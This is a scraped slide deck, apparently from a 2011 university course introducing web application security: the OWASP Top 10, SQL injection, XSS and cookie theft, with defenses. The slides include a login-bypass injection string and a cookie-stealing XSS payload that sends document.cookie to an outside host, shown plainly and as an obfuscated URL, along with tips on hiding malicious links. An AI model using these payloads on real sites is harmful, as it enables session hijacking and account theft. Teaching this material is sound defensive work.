不要被抓到! - 國立中央大學電子計算機中心

arghtalentData Management

Jan 31, 2013 (4 years and 8 months ago)

383 views


中央大學電子計算機中心

「多媒體與網路應用」

資訊推廣課程

網頁應用程式的安全入門

日期
: 2011/03/27

講師
:
資工三

張竟



cwebb [dot] tw [at] gmail [dot] com

Agenda

嘴砲

OWSAP Top 10

SQL injection

XSS

cookie & session

2

Agenda

嘴砲

OWSAP Top 10

SQL injection

XSS

cookie & session

3

不要做
壞事!

4

不要被
抓到!

5

不要被
抓到!

6

不要說我教的

7

Agenda

嘴砲

OWSAP Top 10

SQL injection

XSS

cookie & session

8

網頁安全?

早年

vs
現代

靜態

vs
動態

有程式

就有漏洞
!

9

ways to attack

OS

web server

web application

10

attack scenarios

attack web server


gain privilege


steal informations


to attack users

attack other user


steal informations


execute other attacks

may be composite

11

Agenda

嘴砲

OWSAP Top 10

SQL injection

XSS

cookie & session

12

13

OWASP Top 10
-

2010

A1: Injection

A2: Cross
-
Site Scripting (XSS)

A3: Broken Authentication and
Session Management

A4: Insecure Direct Object
References

A5: Cross
-
Site Request Forgery
(CSRF)

14

OWASP Top 10
-

2010

A6: Security Misconfiguration

A7: Insecure Cryptographic Storage

A8: Failure to Restrict URL Access

A9: Insufficient Transport Layer
Protection

A10: Unvalidated Redirects and
Forwards

15

OWASP Top 10
-

2010

A1: Injection

A2: Cross
-
Site Scripting (XSS)

A3: Broken Authentication and
Session Management

A4: Insecure Direct Object
References

A5: Cross
-
Site Request Forgery
(CSRF)

16

OWASP Top 10
-

2010

A6: Security Misconfiguration

A7: Insecure Cryptographic Storage

A8: Failure to Restrict URL Access

A9: Insufficient Transport Layer
Protection

A10: Unvalidated Redirects and
Forwards

17

Agenda

嘴砲

OWSAP Top 10

SQL injection

XSS

cookie & session

18

Injections

駭客的填空遊戲

where can attacker inject?


database (MySQL, MS SQL, PostgreSQL ... )


no
-
sql


Directory Service (LDAP)


system command!!

19

how SQL works in
web

login page for example






client

web server

sql server

20

Why SQL?

廣大使用

儲存大量的網站資料

injection friendly

21

how injections work?


MySQL
為例子

$query = “select from account where
`id`=’$id’ and `pwd`=’$pwd’


$id=’ or 1=1
--


> select from account where `id`=’’
--

....

22

attack skills

union

blind attack

23

影響

資料被偷
/
被改

獲得網站權限

整個網站被拿下
#

24

how to defense

safe API

過濾逃脫字元


不要直接把使用者輸入加入
query

找程式掃描弱點

25

Practice

26

Agenda

嘴砲

OWSAP Top 10

SQL injection

XSS

cookie & session

27

XSS

C
ross
S
ite
S
cripting

在別人的網站上寫程式!


28

background
knowledge

HTTP GET

HTTP POST

29

how to attack

attack using POST/GET

the “scripting”

in the server

strange url

30

how to attack

javascript

<iframe> / <image>

31

example

<body>


<? echo “Hello ”.$_GET[‘id’].”; ?>

</body>

http://goodsite.com/?id=
<script>alert(“i’m
Orange”)</script>

32

what may happened?

take you to bad site

send your information to attacker

Just For Fun!

33

Just For Fun Samy

MySpace XSS attack

Samy is my hero!

Infection

34

Big Site also
XSSable

MySpace

Facebook

twitter

Plurk

...

35

how to defense

for server

該逃的還是要逃

找程式掃描弱點

for user

看到奇怪連結要警覺

瀏覽器

/
防毒軟體

36

practice

37

Agenda

嘴砲

OWSAP Top 10

SQL injection

XSS

cookie & session

38

bac
k
ground
knowledge

cookie




session





A cookie is a piece of
text

stored by a user
's w
eb brow
ser.

A cook
ie can be used for authentication, sto
ring site
pref
erences,

shopping cart contents, the ident
ifier for a s
erver
-
based session,

or anything else that can be accompl
ished t
hrough storing text
data.

The session information is stored on the web server using the
session identifier (session ID) generated as a result of the first
(sometimes the first authenticated) request from the end user
running a web browser. The "storage" of session IDs and the
associated session data (user name, account number, etc.) on
the web server is accomplished using a variety of techniques
including, but not limited to: local memory, flat files, and
databases.

39


40


41

如果偷到了
cookie

可以
....

42

how to steal it?

43


44


cookie
送到雲端
!


GET / POST
方式讓網頁把
cookie
送走

<img> / <iframe>

ex: ["<img src='
http://in1.ncu.cc/~975002063/keke/t.php?t=
",document.cookie," >"].join(

sever side is simple

just keep the cookie

45

哪個
白痴

會點這
鬼連結

http://example.com/?samname=%22%3E%3Cscript%3Edocument.write%28[
String.fromCharCode%2860,105,109,103,3
2,115,114,99,61,39,104,116,116,112,58,47,47,105,110,49,46,110,99,117,46,99,99,47,126,57,55,53,48,48,50,48,54,51,47,
107,101,107,101,47,116,46,112,104,112,63,116,61,34%29,document.cookie,String.fromCharCode%2834,39,62%29].join
%28%29%29;%3C/script%3E%3C%22

46

hidden

有種東西叫短網址


(tinyurl.com / 0rz.tw / goo.gl / bit.ly)

塞進別的網頁裡



(ex: iframe
長寬設
0

1)

ugly url EVERY WHERE

https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fm
ail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1eic6yu9oa4y3&scc=1&ltmpl=default&ltmplcache=2

https://login.yahoo.com/config/login?.intl=tw&.pd=c%3d7pP3Kh2p2e4XklntZWWfDLAC8w
--
&.done=https://tw.login.yahoo.com/cgi
-
bin/kcookie.cgi/www/http%3a//tw.yahoo.com&rl=1

47

防範

鎖定
user agent / header


IP

*
不要被攻擊成功
*

48

鎖定
user agent / header


if (isset($_SESSION['HTTP_USER_AGENT'])){ if
($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT']))
{ exit(); }}else{ $_SESSION['HTTP_USER_AGENT'] =
md5($_SERVER['HTTP_USER_AGENT']);}

但是
...
當你偷的到
cookie
會拿不到
header

?

49

Practice

50

Q&A?


51

52

Reference

53

http://www.owasp.org/

http://en.wikipedia.o
rg/

http://goo.gl/cA3a

h
ttp://goo.gl/IwGbX

http:/
/goo.gl/uQ4I1